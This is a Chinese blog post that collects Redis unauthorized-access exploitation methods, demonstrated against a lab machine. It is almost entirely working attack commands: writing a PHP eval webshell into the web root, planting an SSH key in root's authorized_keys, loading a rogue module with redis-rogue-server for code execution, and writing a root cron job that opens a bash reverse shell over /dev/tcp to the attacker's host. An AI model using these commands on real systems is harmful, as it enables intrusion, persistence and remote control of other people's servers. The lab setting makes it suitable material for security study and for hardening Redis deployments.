Redis未授权访问漏洞利用合集

一、基本信息

靶机:IP:192.168.100.40

攻击机:IP:192.168.100.60

二、漏洞 & 过程

Redis 未授权访问漏洞利用无口令远程登录靶机

靶机

复制代码

|---|--------------------------------|
| | cd redis-4.0.8/src |
| | ./redis-server ../redis.conf |

攻击机

复制代码

|---|---------------------------------|
| | ./redis-cli -h 192.168.100.40 |

Redis 未授权访问漏洞利用持久化写入一句话木马

攻击机写下如下 redis 命令
复制代码

|---|--------------------------------------------------------------------|
| | config set dir /var/www/html |
| | config set dbfilename test.php |
| | set webshell "\r\n\r\n<?php @eval($_POST['passwd']); ?>\r\n\r\n" |
| | save |

蚁剑连接

Redis 未授权访问漏洞利用公私钥认证获取 root 权限

攻击机 & 靶机

复制代码

|---|---------------------|
| | ssh-keygen -t rsa |

攻击机

复制代码

|---|------------------------------------------------------------------------------|
| | (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt |
| | cat 1.txt | /root/redis-4.0.8/src/redis-cli -h 192.168.100.40 -x set crack |

复制代码

|---|-----------------------------------------|
| | config set dir /root/.ssh |
| | config set dbfilename authorized_keys |
| | save |

远程连接
复制代码

|---|-------------------------------------|
| | ssh -i id_rsa root@192.168.100.40 |

Redis 未授权访问漏洞利用攻击软件获得 shell

攻击机

复制代码

|---|---------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | slaveof 192.168.100.60 6379 |
| | info replication |

复制代码

|---|-----------------------------------------------------|
| | unzip redis-rogue-server-master.zip |
| | cd redis-rogue-server-master/RedisModulesSDK/exp |
| | make |

复制代码

|---|----------------------------------------------------------------------------------------------------------------------------|
| | python3 /root/redis-rogue-server-master/redis-rogue-server.py --rhost 192.168.100.40 --lhost 192.168.100.60 --exp exp.so |

未授权访问漏洞利用持久化写计划任务来反弹一个 shell 权限

攻击机监听端口

复制代码

|---|-----------------|
| | nc -lvvp 8888 |

设置 shell 反弹

复制代码

|---|---------------------------------------------------------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.100.60/8888 0>&1\n\n" |
| | config set dir /var/spool/cron/ |
| | config set dbfilename root |
| | save |

反弹成功

作 者:PeiyuJue

链 接: Redis未授权访问漏洞利用合集 -- Candid Chronicles

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
云卓SKYDROID11 分钟前
无人机的激光雷达避障系统阐述!
科技·安全·无人机·云卓科技·激光雷达避障系统
Dlwyz29 分钟前
问题: redis-高并发场景下如何保证缓存数据与数据库的最终一致性
数据库·redis·缓存
恃宠而骄的佩奇33 分钟前
i春秋-签到题
web安全·网络安全·蓝桥杯
网安-轩逸41 分钟前
网络安全、Web安全、渗透测试之笔经面经总结
安全·web安全
follycat1 小时前
信息收集--CDN绕过
网络·安全·网络安全
黑客Ela1 小时前
网络安全问题概述
安全·web安全·php
Wh1teR0se1 小时前
详解php://filter--理论
web安全·php
飞升不如收破烂~1 小时前
redis的List底层数据结构 分别什么时候使用双向链表(Doubly Linked List)和压缩列表(ZipList)
redis
黑客呀2 小时前
[系统安全]Rootkit基础
stm32·单片机·系统安全
思通数科多模态大模型2 小时前
10大核心应用场景,解锁AI检测系统的智能安全之道
人工智能·深度学习·安全·目标检测·计算机视觉·自然语言处理·数据挖掘